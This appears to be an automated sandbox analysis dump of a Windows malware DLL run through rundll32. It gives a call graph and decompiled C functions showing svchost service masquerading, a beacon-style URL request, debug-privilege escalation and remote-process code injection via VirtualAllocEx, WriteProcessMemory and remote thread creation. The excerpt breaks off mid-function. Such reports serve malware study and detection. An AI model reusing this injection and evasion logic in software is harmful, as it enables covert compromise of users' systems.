21088->21026 21090 464be23 21089->21090 21090->21026 21094 464be5b 21091->21094 21095 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21092->21095 21096 464bfba LocalFree LocalFree CloseServiceHandle 21093->21096 21108 464bef1 21093->21108 21094->21026 21097 464beb8 21095->21097 21105 464bfd0 21096->21105 21097->21026 21098 464bf0a OpenServiceW 21102 464bf1c QueryServiceConfigW 21098->21102 21098->21108 21099 464c008 21100 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21099->21100 21103 464c01b 21100->21103 21101 464bfb4 21101->21096 21104 464bf87 CloseServiceHandle 21102->21104 21102->21108 21103->21026 21104->21108 21105->21099 21214 4649000 LoadLibraryA GetProcAddress 21105->21214 21107 464bf46 StrStrIW 21107->21104 21107->21108 21108->21098 21108->21101 21108->21104 21108->21107 21109 464bf75 CloseServiceHandle 21108->21109 21109->21108 21185 4645ca0 GetCurrentProcessId CreateToolhelp32Snapshot Process32FirstW 21110->21185 21113 4647004 ___scrt_fastfail 21192 4646ef0 OpenProcess 21113->21192 21114 4646fe7 21204 4645d40 10 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21114->21204 21116 4646fec 21116->21113 21117 4646ff2 21116->21117 21119 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21117->21119 21121 4647000 21119->21121 21120 4647027 21120->21117 21122 4647045 21120->21122 21121->21048 21123 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21122->21123 21124 46470cf 21123->21124 21124->21048 21205 4646050 21125->21205 21130 4646d56 RegCreateKeyExW 21133 4646d95 RegSetValueExW RegCloseKey 21130->21133 21134 4646dd0 21130->21134 21131 4646cff RegQueryValueExW RegCloseKey 21131->21130 21132 4646d40 21131->21132 21135 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21132->21135 21133->21132 21133->21134 21136 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21134->21136 21137 
4646d52 21135->21137 21138 4646dde 21136->21138 21137->21053 21138->21053 21140 46459a2 21139->21140 21141 4645981 GetNativeSystemInfo 21139->21141 21142 4649770 21140->21142 21141->21140 21143 4649788 21142->21143 21144 464978a CreateFileW 21142->21144 21143->21144 21145 46498fc 21144->21145 21146 46497af GetFileSize 21144->21146 21145->21059 21147 46497c7 21146->21147 21148 46498f2 FindCloseChangeNotification 21146->21148 21149 464980d ReadFile 21147->21149 21152 46497d6 21147->21152 21148->21145 21150 4649826 21149->21150 21151 46498f1 21149->21151 21150->21151 21154 464984c SetFilePointer 21150->21154 21151->21148 21152->21151 21153 4649865 VirtualAlloc 21152->21153 21153->21151 21155 464987b ReadFile 21153->21155 21154->21153 21155->21151 21156 464988e 21155->21156 21157 4649895 VirtualFree CloseHandle 21156->21157 21158 46498b7 21156->21158 21157->21059 21158->21151 21160 46496cf 21159->21160 21161 4646050 8 API calls 21160->21161 21162 46496dc wsprintfW RegCreateKeyExW 21161->21162 21163 4649724 RegSetValueExW RegCloseKey 21162->21163 21164 4649750 21162->21164 21163->21164 21165 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21164->21165 21166 464975f 21165->21166 21166->21061 21168 4646050 8 API calls 21167->21168 21169 46494ec wsprintfW 21168->21169 21170 465dea0 ___scrt_fastfail 21169->21170 21171 464952b RegOpenKeyExW 21170->21171 21172 46495f3 21171->21172 21173 464955b RegQueryValueExW RegCloseKey 21171->21173 21175 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21172->21175 21173->21172 21174 464959c 21173->21174 21174->21172 21176 46495bb wsprintfW OpenEventW 21174->21176 21177 4649604 21175->21177 21178 46495ec CloseHandle 21176->21178 21179 4649608 21176->21179 21177->21063 21178->21172 21180 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21179->21180 21181 4649615 21180->21181 21181->21063 21182->21053 21183->21064 21184->21068 21186 4645cef 21185->21186 21187 
4645d1b FindCloseChangeNotification 21185->21187 21190 4645d0c 21186->21190 21191 4645cfe Process32NextW 21186->21191 21188 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21187->21188 21189 4645d34 21188->21189 21189->21113 21189->21114 21190->21187 21191->21186 21191->21190 21193 4646fa5 21192->21193 21194 4646f20 K32GetModuleFileNameExW 21192->21194 21195 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21193->21195 21194->21193 21197 4646f39 21194->21197 21196 4646fb2 21195->21196 21196->21120 21198 4646f77 21197->21198 21199 4646f4e 21197->21199 21201 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21198->21201 21200 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21199->21200 21202 4646f73 21200->21202 21203 4646fa1 21201->21203 21202->21120 21203->21120 21204->21116 21206 465dea0 ___scrt_fastfail 21205->21206 21207 46461cf RegOpenKeyExW 21206->21207 21208 464623f 21207->21208 21209 46461ff RegQueryValueExW RegCloseKey 21207->21209 21210 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21208->21210 21209->21208 21211 464635d wsprintfW 21210->21211 21212 465dea0 21211->21212 21213 4646cd3 RegOpenKeyExW 21212->21213 21213->21130 21213->21131 21215 464922f 21214->21215 21216 4649049 RtlAdjustPrivilege 21214->21216 21268 464ad30 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21215->21268 21218 464923c 21216->21218 21219 464905e OpenProcess 21216->21219 21221 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21218->21221 21219->21218 21222 4649076 21219->21222 21220 4649234 21220->21218 21220->21219 21223 464924c 21221->21223 21224 4645960 3 API calls 21222->21224 21223->21105 21225 464907b 21224->21225 21226 4649250 VirtualAllocEx 21225->21226 21227 4649083 LoadLibraryA GetProcAddress 21225->21227 21229 4649370 CloseHandle 21226->21229 21230 464926f WriteProcessMemory 21226->21230 21228 
46490a2 21227->21228 21228->21226 21231 46490b5 21228->21231 21234 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21229->21234 21232 4649362 VirtualFreeEx 21230->21232 21233 4649289 21230->21233 21254 4648c60 21231->21254 21232->21229 21233->21232 21269 4645c40 6 API calls 2 library calls 21233->21269 21236 4649389 21234->21236 21236->21105 21237 46490c1 21237->21229 21261 4648ec0 21237->21261 21239 4649298 21241 46492b7 LoadLibraryA GetProcAddress 21239->21241 21242 464929c CreateRemoteThread 21239->21242 21245 46492d2 21241->21245 21246 46492f9 LoadLibraryA GetProcAddress 21241->21246 21243 4649345 WaitForSingleObject 21242->21243 21244 46492b3 21242->21244 21249 4649356 21243->21249 21244->21241 21245->21243 21245->21246 21247 464931c 21246->21247 21247->21243 21247->21249 21248 4649218 21267 4648d90 GetModuleHandleW GetProcAddress GetProcAddress RtlRestoreLastWin32Error 21248->21267 21249->21232 21251 4649227 21251->21229 21252 46490e9 21252->21248 21253 46491fc WaitForSingleObject FindCloseChangeNotification 21252->21253 21253->21248 21255 4648c7e 21254->21255 21256 4648d19 21255->21256 21257 4648d39 GetModuleHandleW GetProcAddress GetProcAddress 21255->21257 21258 4648d6e 21255->21258 21259 4648d80 21255->21259 21256->21237 21257->21258 21258->21259 21260 4648d79 RtlRestoreLastWin32Error 21258->21260 21259->21237 21260->21259 21262 4648ede 21261->21262 21263 4648f79 21262->21263 21264 4648fa1 GetModuleHandleW GetProcAddress GetProcAddress 21262->21264 21265 4648fd6 21262->21265 21263->21252 21264->21265 21265->21263 21266 4648fe1 RtlRestoreLastWin32Error 21265->21266 21266->21263 21267->21251 21268->21220 21269->21239 21273 463e6e0 60 API calls 21270->21273 21274 464c0a0 90 API calls 21270->21274 21493 463af60 GetProcessHeap HeapFree 21385 4651560 14 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21387 4669d68 29 API calls _free 21389 4639170 40 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 
21494 464ab70 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21390 4651970 26 API calls 21391 466ed7f 42 API calls 2 library calls 21392 4647978 26 API calls 21393 4635d7c 33 API calls 4 library calls 21394 4631140 16 API calls 21395 4641d40 108 API calls 21396 4641940 40 API calls 21495 4643f40 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21496 467234e 49 API calls 9 library calls 21497 4671f48 ___InternalCxxFrameHandler 21398 4631550 7 API calls 21498 4631750 ___swprintf_l ___swprintf_l 21499 4642f50 116 API calls 21400 4653150 32 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21401 4636d20 111 API calls 21402 463352b RaiseException __CxxThrowException@8 21404 4638d30 64 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21405 4634130 104 API calls 21501 465e731 7 API calls 2 library calls 21502 466ef32 GetLastError WriteConsoleW CreateFileW 21503 463e700 72 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21406 4644100 WaitForMultipleObjects TerminateThread TerminateProcess 20897 4656109 20898 4656115 ___BuildCatchObject 20897->20898 20915 4655cc7 20898->20915 20900 465611c 20901 4656149 20900->20901 20902 4656121 ___scrt_is_nonwritable_in_current_image ___BuildCatchObject 20900->20902 20941 465667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 20900->20941 20924 4655c2a 20901->20924 20905 4656158 __RTC_Initialize 20905->20902 20927 4655ea1 20905->20927 20909 4656170 20910 4655ea1 2 API calls 20909->20910 20911 465617c ___scrt_initialize_default_local_stdio_options 20910->20911 20931 4661678 20911->20931 20913 4656192 20913->20902 20935 466161c 20913->20935 20916 4655cd0 20915->20916 20942 46564ca IsProcessorFeaturePresent 20916->20942 20918 4655ce5 20918->20900 20919 4655cdc 20919->20918 20943 46615d3 20919->20943 20922 4655cf2 ___vcrt_uninitialize 20922->20918 20923 4655cfc 20923->20900 20958 4655d00 
20924->20958 20926 4655c31 20926->20905 20964 4655e66 20927->20964 20930 46568a7 RtlInitializeSListHead 20930->20909 20933 466168f 20931->20933 20932 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20934 46616b9 20932->20934 20933->20932 20934->20913 20936 4661667 20935->20936 20937 466164b 20935->20937 20938 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20936->20938 20937->20936 20972 4631050 20937->20972 20939 4661674 20938->20939 20939->20902 20941->20901 20942->20919 20946 466a907 20943->20946 20949 466a920 20946->20949 20948 4655cee 20948->20922 20948->20923 20950 4655afe 20949->20950 20951 4655b07 20950->20951 20952 4655b09 IsProcessorFeaturePresent 20950->20952 20951->20948 20954 4655ef2 20952->20954 20957 4655eb6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20954->20957 20956 4655fd5 20956->20948 20957->20956 20959 4655d0e 20958->20959 20962 4655d13 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 20958->20962 20959->20962 20963 465667e IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 20959->20963 20961 4655d96 20962->20926 20963->20961 20965 4655e83 20964->20965 20966 4655e8a 20964->20966 20970 466144b RtlEnterCriticalSection RtlLeaveCriticalSection __onexit 20965->20970 20971 46614bb RtlEnterCriticalSection RtlLeaveCriticalSection __onexit 20966->20971 20969 4655e88 20969->20930 20970->20969 20971->20969 20979 4671860 20972->20979 20974 4631068 WSAStartup 20975 4655ea1 RtlEnterCriticalSection RtlLeaveCriticalSection 20974->20975 20976 4631083 20975->20976 20977 4655afe __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20976->20977 20978 4631093 20977->20978 20978->20937 21407 4639510 78 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21504 4639f10 15 API calls 2 library calls 21505 4642f10 CreateThread CloseHandle 21275 466a719 GetStartupInfoW 
21276 466a736 21275->21276 21278 466a7c8 21275->21278 21276->21278 21281 466ce02 21276->21281 21279 466a75f 21279->21278 21280 466a78d GetFileType 21279->21280 21280->21279 21282 466ce0e ___BuildCatchObject 21281->21282 21283 466ce32 21282->21283 21284 466ce1b 21282->21284 21294 4668ef7 RtlEnterCriticalSection 21283->21294 21302 4661772 20 API calls _free 21284->21302 21287 466ce20 21303 465eee6 26 API calls __cftof 21287->21303 21289 466ce2a ___BuildCatchObject 21289->21279 21290 466ce6a 21304 466ce91 RtlLeaveCriticalSection _abort 21290->21304 21292 466ce3e 21292->21290 21295 466cd53 21292->21295 21294->21292 21305 4668535 21295->21305 21297 466cd65 21301 466cd72 21297->21301 21312 4669220 11 API calls 2 library calls 21297->21312 21300 466cdc4 21300->21292 21313 46684ad 20 API calls _free 21301->21313 21302->21287 21303->21289 21304->21289 21310 4668542 _GetRangeOfTrysToCheck 21305->21310 21306 4668582 21315 4661772 20 API calls _free 21306->21315 21307 466856d RtlAllocateHeap 21308 4668580 21307->21308 21307->21310 21308->21297 21310->21306 21310->21307 21314 46609ac 7 API calls 2 library calls 21310->21314 21312->21297 21313->21300 21314->21310 21315->21308 21408 4671de4 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21409 46419e0 DestroyCursor 21411 466f1e2 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21413 46321f0 waveOutWrite waveOutGetNumDevs waveOutOpen waveOutPrepareHeader SetEvent 21414 463edf0 59 API calls 2 library calls 21506 46367f0 CloseDesktop DeleteDC ReleaseDC CloseHandle 21507 4639fc0 ShellExecuteW 21418 46451c0 14 API calls 3 library calls 21421 466cdcd 21 API calls _free 21422 464e9d0 11 API calls 21508 464ffd0 42 API calls 21423 46535a0 61 API calls 21424 46525a0 71 API calls 21427 46399b0 79 API calls 21509 4652fb0 timeGetTime 20892 46563be 20893 46563c7 20892->20893 20894 46563cc dllmain_dispatch 20892->20894 20896 465680b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId 
QueryPerformanceCounter 20893->20896 20896->20894 21511 4667fbb 40 API calls __cftof 21430 463fd80 30 API calls 21431 463a980 36 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21434 464f190 38 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21514 464d790 147 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21515 4652f90 31 API calls 21516 4631f95 57 API calls 21517 466ef9f 39 API calls _GetRangeOfTrysToCheck 21518 4633799 27 API calls

                                                            Control-flow Graph

                                                            C-Code - Quality: 91%
                                                            			E0464C460(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				long _v532;
                                                            				signed int _t15;
                                                            				int _t23;
                                                            				signed int _t24;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				signed int _t38;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				void* _t75;
                                                            				signed int _t77;
                                                            				WCHAR* _t80;
                                                            				void* _t82;
                                                            				signed int _t83;
                                                            				void* _t84;
                                                            				signed int _t86;
                                                            
                                                            				_t15 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t15 ^ _t86;
                                                            				_t80 = GetCommandLineW();
                                                            				GetModuleFileNameW(0,  &_v528, 0x104);
                                                            				_t23 = lstrcmpiW(E0465D9BE( &_v528, 0x5c) + 2, L"svchost.exe"); // executed
                                                            				if(_t23 != 0) {
                                                            					_t24 = L0464ABF0();
                                                            					__eflags = _t24;
                                                            					if(_t24 != 0) {
                                                            						E0464C250(__ebx, _t80, __edi, _t80); // executed
                                                            					} else {
                                                            						_t82 = CreateThread(0, 0, E0464B5F0, 0, 0,  &_v532);
                                                            						WaitForSingleObject(_t82, 0xffffffff);
                                                            						CloseHandle(_t82);
                                                            					}
                                                            					_t26 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0); // executed
                                                            					_t75 = _t26;
                                                            					__eflags = _t75;
                                                            					if(_t75 == 0) {
                                                            						goto L19;
                                                            					} else {
                                                            						_t28 = InternetOpenUrlW(_t75, 0x46865fc, 0, 0, 0x80000000, 0);
                                                            						__eflags = _t28;
                                                            						if(_t28 != 0) {
                                                            							InternetCloseHandle(_t28);
                                                            							InternetCloseHandle(_t75);
                                                            							goto L19;
                                                            						} else {
                                                            							InternetCloseHandle(_t75);
                                                            							__eflags = _v8 ^ _t86;
                                                            							return E04655AFE(_v8 ^ _t86);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					if(StrStrIW(_t80, L"netsvcs") == 0) {
                                                            						_t38 = StrStrIW(_t80, L"WspService");
                                                            						__eflags = _t38;
                                                            						if(_t38 == 0) {
                                                            							__eflags = StrStrIW(_t80, L"AppService");
                                                            							if(__eflags == 0) {
                                                            								L19:
                                                            								__eflags = _v8 ^ _t86;
                                                            								return E04655AFE(_v8 ^ _t86);
                                                            							} else {
                                                            								_v532 = 0;
                                                            								_t77 = E04649620(__ebx,  &_v532, StrStrIW, _t80, __eflags);
                                                            								__eflags = _t77;
                                                            								if(_t77 == 0) {
                                                            									goto L19;
                                                            								} else {
                                                            									_t83 = _v532;
                                                            									__eflags = _t83;
                                                            									if(_t83 == 0) {
                                                            										goto L19;
                                                            									} else {
                                                            										_t41 = E0464BD60(__ebx, _t77, _t83, _t77, _t83);
                                                            										__eflags = _t41;
                                                            										if(_t41 > 0) {
                                                            											goto L19;
                                                            										} else {
                                                            											_push(__ebx);
                                                            											do {
                                                            												Sleep(0x3e8);
                                                            												_t42 = E0464BD60(Sleep, _t77, _t83, _t77, _t83);
                                                            												__eflags = _t42;
                                                            											} while (_t42 <= 0);
                                                            											__eflags = _v8 ^ _t86;
                                                            											return E04655AFE(_v8 ^ _t86);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_t84 = CreateThread(0, 0, E0464B5F0, 0, 0,  &_v532);
                                                            							WaitForSingleObject(_t84, 0xffffffff);
                                                            							CloseHandle(_t84);
                                                            							__eflags = _v8 ^ _t86;
                                                            							return E04655AFE(_v8 ^ _t86);
                                                            						}
                                                            					} else {
                                                            						CloseHandle(CreateThread(0, 0, 0x464ab30, 0, 0, 0));
                                                            						CloseHandle(CreateThread(0, 0, E04649E60, 0, 0,  &_v532));
                                                            						return E04655AFE(_v8 ^ _t86);
                                                            					}
                                                            				}
                                                            			}

                                                            0x0464c5aa
                                                            0x0464c5b1
                                                            0x0464c5b6
                                                            0x0464c5bc
                                                            0x0464c5c1
                                                            0x0464c5c1
                                                            0x0464c5cb
                                                            0x0464c5d5
                                                            0x0464c5d5
                                                            0x0464c5a4
                                                            0x0464c593
                                                            0x0464c585
                                                            0x0464c520
                                                            0x0464c53a
                                                            0x0464c53f
                                                            0x0464c546
                                                            0x0464c551
                                                            0x0464c55b
                                                            0x0464c55b
                                                            0x0464c4cb
                                                            0x0464c4e9
                                                            0x0464c502
                                                            0x0464c513
                                                            0x0464c513
                                                            0x0464c4c9

                                                            APIs
                                                            • GetCommandLineW.KERNEL32(00000001,00000000), ref: 0464C475
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0464C48B
                                                            • lstrcmpiW.KERNEL32(-00000002,svchost.exe), ref: 0464C4AB
                                                            • StrStrIW.SHLWAPI(00000000,netsvcs), ref: 0464C4C5
                                                            • CreateThread.KERNEL32(00000000,00000000,0464AB30,00000000,00000000,00000000), ref: 0464C4E0
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C4E9
                                                            • CreateThread.KERNEL32(00000000,00000000,04649E60,00000000,00000000,?), ref: 0464C4FF
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C502
                                                            • StrStrIW.SHLWAPI(00000000,WspService), ref: 0464C51A
                                                            • CreateThread.KERNEL32(00000000,00000000,0464B5F0,00000000,00000000,?), ref: 0464C534
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C53F
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C546
                                                            • CreateThread.KERNEL32(00000000,00000000,0464B5F0,00000000,00000000,?), ref: 0464C5F3
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C5FE
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C605
                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0464C621
                                                            • InternetOpenUrlW.WININET(00000000,046865FC,00000000,00000000,80000000,00000000), ref: 0464C63E
                                                            • InternetCloseHandle.WININET(00000000), ref: 0464C649
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateThread$Internet$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                            • String ID: AppService$Mozilla/4.0 (compatible)$WspService$netsvcs$svchost.exe
                                                            • API String ID: 2591637205-2775505531
                                                            • Opcode ID: bd1cd32e64750cad2c53e51452c18459c1e5b58393a284288f14f153a27abd7a
                                                            • Instruction ID: 3903e9418c3a8597cfee83632a27eb61502784577f980e6f27551cad5ecb4023
                                                            • Opcode Fuzzy Hash: bd1cd32e64750cad2c53e51452c18459c1e5b58393a284288f14f153a27abd7a
                                                            • Instruction Fuzzy Hash: 9C51D731781218BBEF24AB64AC4DFBE7368DF94B11F151159FA05E62C0FFA4BD018A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 4649000-4649043 LoadLibraryA GetProcAddress 67 464922f-4649236 call 464ad30 66->67 68 4649049-4649058 RtlAdjustPrivilege 66->68 70 464923c-464924f call 4655afe 67->70 71 464905e-4649070 OpenProcess 67->71 68->70 68->71 71->70 74 4649076-464907d call 4645960 71->74 78 4649250-4649269 VirtualAllocEx 74->78 79 4649083-46490a0 LoadLibraryA GetProcAddress 74->79 82 4649370-464938c CloseHandle call 4655afe 78->82 83 464926f-4649283 WriteProcessMemory 78->83 80 46490a2-46490a7 79->80 81 46490aa-46490af 79->81 80->81 81->78 84 46490b5-46490d0 call 4648c60 81->84 85 4649362-464936a VirtualFreeEx 83->85 86 4649289-464928d 83->86 84->82 93 46490d6-46490ee call 4648ec0 84->93 85->82 86->85 89 4649293-464929a call 4645c40 86->89 96 46492b7-46492d0 LoadLibraryA GetProcAddress 89->96 97 464929c-46492ad CreateRemoteThread 89->97 105 46490f4-46490f8 93->105 106 4649218-464922a call 4648d90 93->106 101 46492d2-46492f7 96->101 102 46492f9-464931a LoadLibraryA GetProcAddress 96->102 99 4649345-4649356 WaitForSingleObject 97->99 100 46492b3 97->100 108 464935e 99->108 100->96 101->99 101->102 103 464931c-4649338 102->103 104 464933b-4649343 102->104 103->104 104->99 104->108 105->106 110 46490fe-4649126 call 4648390 call 4648b90 105->110 106->82 108->85 117 4649128-4649174 call 46481b0 110->117 118 464917a-46491a2 call 4648390 call 4648b90 110->118 117->118 123 46491fc-4649210 WaitForSingleObject FindCloseChangeNotification 117->123 118->106 126 46491a4-46491fa call 46481b0 118->126 123->106 126->106 126->123
                                                            C-Code - Quality: 50%
                                                            			E04649000(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                                            				signed int _v8;
                                                            				char _v28;
                                                            				char _v32;
                                                            				long _v36;
                                                            				void* _v40;
                                                            				signed int _v44;
                                                            				void* _v48;
                                                            				void* _v52;
                                                            				void* _v92;
                                                            				signed int _t52;
                                                            				void* _t60;
                                                            				struct _SECURITY_ATTRIBUTES* _t68;
                                                            				_Unknown_base(*)()* _t70;
                                                            				_Unknown_base(*)()* _t72;
                                                            				void* _t73;
                                                            				_Unknown_base(*)()* _t81;
                                                            				signed int _t83;
                                                            				void* _t84;
                                                            				signed int _t87;
                                                            				signed int _t89;
                                                            				void* _t93;
                                                            				long _t102;
                                                            				long _t104;
                                                            				signed int _t118;
                                                            				signed int _t127;
                                                            				signed int _t128;
                                                            				void* _t133;
                                                            				void* _t135;
                                                            				signed int _t136;
                                                            				long _t138;
                                                            				void* _t139;
                                                            				signed int _t142;
                                                            				signed int _t144;
                                                            				void* _t146;
                                                            				void* _t147;
                                                            
                                                            				_t144 = (_t142 & 0xfffffff8) - 0x34;
                                                            				_t52 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t52 ^ _t144;
                                                            				_push(__ebx);
                                                            				_t104 = _a4;
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t138 = __ecx;
                                                            				_v52 = __edx;
                                                            				_v32 = 0;
                                                            				if(GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege") == 0) {
                                                            					if(E0464AD30(_t138) != 0) {
                                                            						goto L2;
                                                            					} else {
                                                            						goto L17;
                                                            					}
                                                            				} else {
                                                            					_t102 = RtlAdjustPrivilege(0x14, 1, 0,  &_v36); // executed
                                                            					if(_t102 < 0) {
                                                            						L17:
                                                            						return E04655AFE(_v8 ^ _t144);
                                                            					} else {
                                                            						L2:
                                                            						_t139 = OpenProcess(0x43a, 0, _t138);
                                                            						if(_t139 == 0) {
                                                            							goto L17;
                                                            						} else {
                                                            							_t60 = E04645960(); // executed
                                                            							if(_t60 == 0) {
                                                            								L18:
                                                            								_t133 = VirtualAllocEx(_t139, 0, _t104, 0x3000, 0x40);
                                                            								_v44 = _t133;
                                                            								if(_t133 != 0) {
                                                            									if(WriteProcessMemory(_t139, _t133, _v52, _t104,  &_v36) != 0 && _v36 == _t104) {
                                                            										_t68 = E04645C40(_t133);
                                                            										if(_t68 != 0) {
                                                            											L24:
                                                            											_t70 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlCreateUserThread");
                                                            											if(_t70 == 0) {
                                                            												L26:
                                                            												_v48 = 0;
                                                            												_t72 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
                                                            												if(_t72 != 0) {
                                                            													 *_t72( &_v48, 0x1fffff, 0, _t139, _v44, 0, 0, 0, 0, 0, 0);
                                                            												}
                                                            												_t73 = _v48;
                                                            												_t135 = _t73;
                                                            												if(_t73 != 0) {
                                                            													goto L29;
                                                            												}
                                                            											} else {
                                                            												_v52 = 0;
                                                            												 *_t70(_t139, 0, 0, 0, 0, 0, _t133, 0,  &_v52, 0);
                                                            												_t135 = _v92;
                                                            												if(_t135 != 0) {
                                                            													goto L29;
                                                            												} else {
                                                            													goto L26;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_t135 = CreateRemoteThread(_t139, _t68, _t68, _t133, _t68, _t68, _t68);
                                                            											if(_t135 != 0) {
                                                            												L29:
                                                            												WaitForSingleObject(_t135, 0xffffffff);
                                                            												CloseHandle(_t135);
                                                            												_v36 = 1;
                                                            											} else {
                                                            												_t133 = _v48;
                                                            												goto L24;
                                                            											}
                                                            										}
                                                            										_t133 = _v44;
                                                            									}
                                                            									VirtualFreeEx(_t139, _t133, _t104, 0x4000);
                                                            								}
                                                            							} else {
                                                            								_v48 = 0;
                                                            								_t81 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            								if(_t81 != 0) {
                                                            									 *_t81(_t139,  &_v48);
                                                            								}
                                                            								if(_v48 != 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									_t127 = _t104;
                                                            									_t136 = E04648C60(_t139, _t127);
                                                            									_t144 = _t144 - 0x10 + 0x10;
                                                            									_t83 = _t127;
                                                            									_v44 = _t83;
                                                            									if((_t136 | _t83) != 0) {
                                                            										_t128 = _v52;
                                                            										_t118 = _t139;
                                                            										_t84 = E04648EC0(_t118, _t128, _t136, _t83, _t104,  &_v40);
                                                            										_t146 = _t144 + 0x10;
                                                            										if(_t84 != 0 && _v40 == _t104) {
                                                            											_v48 = 0;
                                                            											_t87 = L04648B90(_t104, "RtlCreateUserThread", _t128, _t136, _t139, L04648390(_t118), _t128);
                                                            											_v40 = _t87;
                                                            											_t147 = _t146 + 8;
                                                            											_v52 = _t128;
                                                            											_t118 = _t87 | _t128;
                                                            											if(_t118 == 0) {
                                                            												L12:
                                                            												_v40 = 0;
                                                            												_t89 = L04648B90(_t104, "NtCreateThreadEx", _t128, _t136, _t139, L04648390(_t118), _t128);
                                                            												_v36 = _t89;
                                                            												_t146 = _t147 + 8;
                                                            												_v52 = _t128;
                                                            												_t118 = _t89 | _t128;
                                                            												if(_t118 != 0) {
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(_v44);
                                                            													_push(_t136);
                                                            													asm("cdq");
                                                            													_push(_t128);
                                                            													_push(_t139);
                                                            													_push(0);
                                                            													_push(0);
                                                            													_push(0);
                                                            													asm("cdq");
